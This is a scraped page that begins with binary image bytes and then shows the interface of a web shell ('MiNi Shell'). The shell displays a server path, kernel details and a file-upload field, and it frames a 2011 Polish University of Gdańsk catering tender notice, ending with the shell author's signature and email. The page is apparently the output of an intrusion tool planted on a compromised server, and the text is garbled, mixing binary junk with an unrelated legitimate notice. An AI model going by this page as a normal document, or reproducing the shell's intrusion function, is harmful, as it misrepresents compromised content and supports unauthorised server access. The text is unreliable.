JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110113/15997-N-2011.html

<p class="kh_header"><b>Gdańsk: Sukcesywne  usługi przygotowywania i dostarczania posiłków  na potrzeby  jednostek organizacyjnych Uniwersytetu Gdańskiego, zamówienie obejmuje dostawę wyżywienia dla obsługi   szkoleń, kursów, zjazdów, konferencji, imprez okolicznościowych  (jednodniowych i wielodniowych).</b><br>
<b>Numer ogłoszenia: 15997 - 2011; data zamieszczenia: 13.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484, 5523741.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne  usługi przygotowywania i dostarczania posiłków  na potrzeby  jednostek organizacyjnych Uniwersytetu Gdańskiego, zamówienie obejmuje dostawę wyżywienia dla obsługi   szkoleń, kursów, zjazdów, konferencji, imprez okolicznościowych  (jednodniowych i wielodniowych)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.      Kod Klasyfikacji Wspólnego Słownika Zamówień:  CPV55321000-6 usługi przygotowania posiłków;  55520000 - 1 usługi dostarczania posiłków. 
2.      Przedmiotem  zamówienia są : sukcesywne  usługi  przygotowywania i dostarczania posiłków  na potrzeby  jednostek organizacyjnych Uniwersytetu Gdańskiego, zamówienie obejmuje dostawę wyżywienia dla obsługi   szkoleń, kursów, zjazdów, konferencji , imprez okolicznościowych (jednodniowych i wielodniowych). 
3.	Wykonawca zobowiązuje się do :
1)	 zapewnienia wymaganego standardu usług  oraz przestrzegania obowiązujących przepisów sanitarnych, porządkowych i higienicznych, a także przeciwpożarowych;
2)	terminowego przygotowania i dostarczenia zamówionych posiłków do miejsca ich świadczenia oraz zorganizowania usługi  w miejscu wyznaczonym przez Zamawiającego, według  załącznika nr 2 ;
3)	 zapewnienia obsługi wraz z zaopatrzeniem obsługi w artykuły higieniczne;
4)	zapewnienia naczyń z porcelany, obrusów, sprzętu i obsługi kelnerskiej;
5)	 pozostawienia  pomieszczeń po skończonej obsłudze  w takim stanie w jakim zastały mu  przekazane;
6)	dostarczenia przedmiotu  usług na własny koszt i ryzyko w terminie umożliwiającym bezproblemowe przygotowanie wskazanej sali do świadczenia usług;
7)	umożliwienia przedstawicielowi Zamawiającego sprawdzenie ilości i jakości dostarczonych produktów żywnościowych oraz posiłków, a także ich zgodności z zamówieniem, umową oraz SIWZ ,przed wykonaniem usługi. W razie stwierdzenia jakichkolwiek niezgodności niezależnie od innych postanowień niniejszej umowy Zamawiającemu przysługuje prawo obniżenia wynagrodzenia Wykonawcy stosownie do wartości braków ilościowych lub jakościowych. 

4.  Wykonawca gwarantuje, że usługi świadczone będą na najwyższym poziomie tj.: 
1)	dostarczone produkty żywnościowe będą świeże, produkty przetworzone takie jak kawa, herbata, napoje itp. będą posiadały datę przydatności do spożycia wygasająca nie wcześniej niż na 5 miesięcy przed terminem podania w wykonaniu świadczonych przez Wykonawcę usług cateringowych, potrawy gotowane winny być przyrządzone tego samego dnia, co świadczenie usług cateringowych;
2)	zastawa będzie czysta, nieuszkodzona (nie wyszczerbiona itp.) i wysterylizowana zgodnie z przepisami w tym zakresie obowiązującymi;
3)	obsługa będzie świadczona na właściwym poziomie, zgodnie z zasadami w tym zakresie obowiązującymi (dotyczy to w szczególności kultury obsługi przez personel kelnerski);
4)	pracownicy wykonujący bezpośrednio obsługę kelnerską  szkoleń, kursów, zjazdów, konferencji,   imprez okolicznościowych Zamawiającego będą ubrani w jednakowe ubrania, ubiór ten spełniać będzie wszystkie wymagane standardy;
5)	pracownicy mający kontakt z żywnością będą posiadali aktualne badania sanitarno-epidemiologiczne.

5. Wykonawca oświadcza, iż posiada wszelkie wymagane prawem uprawnienia                            i zezwolenia do efektywnego świadczenia usług objętych przedmiotem niniejszej umowy. Wykonawca jest zobowiązany niezwłocznie zawiadomić Zamawiającego o utracie wymaganych uprawnień i zezwoleń niezbędnych do prawidłowej realizacji niniejszej umowy oraz innych zmian w tym zakresie. 
6.   Zamawiający oświadcza że:
1)	zapewni pomieszczenia z przeznaczeniem dla ulokowania produktów żywnościowych i  naczyń potrzebnych do obsługi Zamawiającego;
2)	w przypadku  rezygnacji (całkowitej lub częściowej), lub przesunięcia terminu    zamówionej usługi, na co najmniej 7 dni przed terminem jej wykonania  zawiadomi Wykonawcę  o zaistniałych okolicznościach, bez prawa Wykonawcy do odszkodowania z tego tytułu. 
7.    Sukcesywne usługi  mają być realizowane na podstawie składanych przez jednostki organizacyjne Zamawiającego, pocztą elektroniczną, faxem  lub pisemnie.
8.	Po złożeniu zamówienia  drogą elektroniczną przez  jednostkę organizacyjną Uniwersytetu Gdańskiego, Wykonawca w nieprzekraczalnym terminie 3 dni roboczych, potwierdzi drogą elektroniczną odbiór zamówienia wraz  z  wstępną kalkulacją kosztów.
9.	Wykonanie usługi następuje we  wskazanej w zamówieniu jednostce organizacyjnej Zamawiającego. 
10.	Zamawiający uprawniony będzie do kontroli przestrzegania uzgodnionych warunków usługi  i udzielania Wykonawcy w razie potrzeby niezbędnych wskazówek.
11.	Faktura,  ma być dostarczona do jednostki organizacyjnej Zamawiającego w ciągu 7 dni.
12.	Faktura za usługi, poza wymogami księgowymi, musi  zawierać: cenę jednostkową posiłku (zgodnie z ofertą - załącznik nr 2) oraz dodatkowe informacje: nawę jednostki organizacyjnej Zamawiającego imię i nazwisko osoby dokonującej zamówienia.
13.	Faktura opłacona będzie przelewem bankowym w ciągu 21 dni od daty 	otrzymania przez Zamawiającego oryginału faktury.
14.    Szacunkowa skala potrzeb Zamawiającego na  czas trwania umowy nie jest możliwa do ustalenia na etapie przeprowadzania postępowania o zamówienie publiczne. Rzeczywista ilość  usług  wynikać będzie z bieżącego zlecenia usługi przez Zamawiającego.
15.      Zamawiający zastrzega sobie prawo do rezygnacji z realizacji części zamówienia do 30% jego łącznej wartości. W takim przypadku Wykonawcy nie przysługują roszczenia odszkodowawcze wobec Zamawiającego.
16.      Przy wycenie usług Wykonawca winien wziąć pod uwagę strukturę organizacyjną Uczelni i możliwość zamawiania posiłków  na podstawie indywidualnych zapotrzebowań   wg struktury  organizacyjnej Uniwersytetu Gdańskiego. Zatem, miejscem usługi  może być siedziba każdej jednostki organizacyjnej Uniwersytetu Gdańskiego.
17.      Struktura administracyjna Uniwersytetu Gdańskiego udostępniona jest na stronie www.univ.gda.pl w  zakładce O Uniwersytecie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zgodnie z art. 67 ust.1 pkt.7 ustawy Prawo zamówień publicznych , przewiduje możliwość wystąpienia zamówień  uzupełniających, nie więcej niż  20%  wartości  zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wpłacenia  wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga posiadania  specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazu wykonanych usług  w zakresie przygotowywania i dostawy posiłków,  w okresie  ostatnich trzech lat  przed upływem terminu składania ofert  a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, Wykonawca wykonał (zakończył), co najmniej  dwa  zamówienia  o wartości nie mniejszej niż 50 000,00 PLN  każde  z podaniem    wartości usług, przedmiotu zamówienia, daty wykonania i odbiorcy oraz  załączenia dokumentów potwierdzających, że usługi  zostały wykonane należycie,  wykaz podpisany przez osoby upoważnione do reprezentowania danej firmy  - załącznik nr 4.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza posiadania szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza posiadania szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza posiadania szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiana  terminu realizacji umowy ze względu na wystąpienie okoliczności  z przyczyn  leżących po stronie Zamawiającego, w szczególności sytuacja ekonomiczna (zdolności płatnicze) lub warunki organizacyjne czy też z przyczyn technicznych, nie dających się przewidzieć przed zawarciem umowy.
2.   Zmiana przedstawiciela Zamawiającego i Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.univ.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pdzp.univ.gda.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2011 godzina 11:00, miejsce: pokój 124 Rektoratu, ul. Bażyńskiego 1A 80-952 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com